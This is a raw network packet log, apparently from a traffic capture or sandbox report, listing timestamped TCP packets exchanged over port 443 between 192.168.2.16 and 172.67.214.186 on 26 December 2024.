                                                                                                                                                                              Dec 26, 2024 18:26:41.579044104 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:41.580275059 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:41.623331070 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.220793962 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.220839977 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.220875025 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.220896006 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.220911980 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.220922947 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.220956087 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.220968962 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.221009016 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.221014023 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.229130983 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.229176044 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.229195118 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.237628937 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.237683058 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.237704992 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.284689903 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.284698009 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.332676888 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.340612888 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.380680084 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.430978060 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.441174984 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.441231012 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.441240072 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.448864937 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.448914051 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.448921919 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.456695080 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.456753969 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.456760883 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.464459896 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.464505911 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.464513063 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.472381115 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.472428083 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.472434998 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.480083942 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.480135918 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.480143070 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.486526012 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.486579895 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.486588001 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.493366957 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.493410110 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.493417025 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.499764919 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.503212929 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.503218889 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.505948067 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.505990028 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.505995989 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.556741953 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.556747913 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.604676008 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.641894102 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.645080090 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.645128012 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.645138979 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.650388956 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.650439978 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.650446892 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.655344963 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.655390978 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.655399084 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.665298939 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.665366888 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.665380955 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.665433884 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.675471067 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.675479889 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.675538063 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.680533886 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.680586100 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.685643911 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.685651064 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.685703039 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.695761919 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.695770979 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.695827007 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.705785036 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.705797911 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.705845118 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.715922117 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.715992928 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.721124887 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.721226931 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.731225014 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.731283903 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.741344929 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.741404057 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.746460915 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.746567965 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.852333069 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.852415085 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.858181953 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.858256102 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.862493992 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.862551928 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.870448112 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.870515108 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.877892971 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.877959013 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.885245085 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.885308027 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.889208078 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.889269114 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.896687031 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.896745920 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.900439024 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.900501013 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.907417059 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.907478094 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.914473057 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.914530039 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.918102026 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.918164015 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.925292969 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.925350904 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.932280064 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.932338953 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.939340115 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.939399958 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.942944050 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.943003893 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.950040102 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.950098038 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.953690052 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.953758001 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.960781097 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.960835934 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.967822075 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.967879057 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:42.974931002 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:42.974989891 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.066720009 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.066798925 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.067922115 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.067976952 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.073040962 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.073095083 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.075695992 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.075752020 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.081077099 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.081136942 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.086064100 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.086118937 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.091445923 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.091509104 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.093985081 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.094043970 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.105909109 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.105916977 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.105956078 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.105982065 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.105990887 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.106023073 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.121087074 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.121109009 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.121151924 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.121160030 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.121181965 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.135934114 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.135950089 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.136015892 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.136025906 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.150150061 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.150166988 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.150234938 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.150245905 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.165201902 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.165221930 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.165266037 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.165277004 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.165316105 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.178224087 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.178241014 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.178307056 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.178325891 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.226686001 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.279683113 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.279695988 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.279738903 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.279761076 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.279767036 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.279786110 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.279813051 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.279840946 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.287729025 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.287744999 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.287810087 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.287825108 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.287869930 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.298703909 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.298718929 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.298788071 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.298799992 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.298837900 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.310378075 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.310394049 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.310460091 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.310472012 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.310508966 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.319544077 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.319564104 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.319624901 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.319634914 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.319677114 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.328778028 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.328794003 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.328854084 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.328865051 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.328908920 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.337130070 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.337146044 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.337215900 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.337227106 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.337263107 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.345669031 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.345700026 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.345755100 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.345761061 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.345788002 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.345808029 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.486881971 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.486913919 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.486968994 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.486977100 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.487026930 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.487046003 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.494230986 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.494252920 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.494307041 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.494311094 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.494347095 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.494370937 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.501740932 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.501763105 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.501831055 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.501837015 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.501887083 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.508318901 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.508338928 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.508383036 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.508388042 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.508416891 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.508435965 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.516210079 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.516230106 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.516274929 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.516279936 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.516324043 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.522800922 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.522823095 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.522862911 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.522867918 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.522897005 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.522916079 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.526845932 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.530150890 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.530172110 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.530219078 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.530224085 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.530260086 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.530280113 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.537560940 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.537580967 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.537633896 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.537638903 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.537686110 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.697519064 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.697541952 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.697582960 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.697591066 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.697613955 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.697638988 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.704978943 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.705004930 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.705037117 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.705040932 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.705068111 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.705087900 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.711648941 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.711669922 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.711724997 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.711730003 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.711750031 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.711769104 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.718976974 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.718996048 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.719048977 CET49719443192.168.2.16172.67.214.186
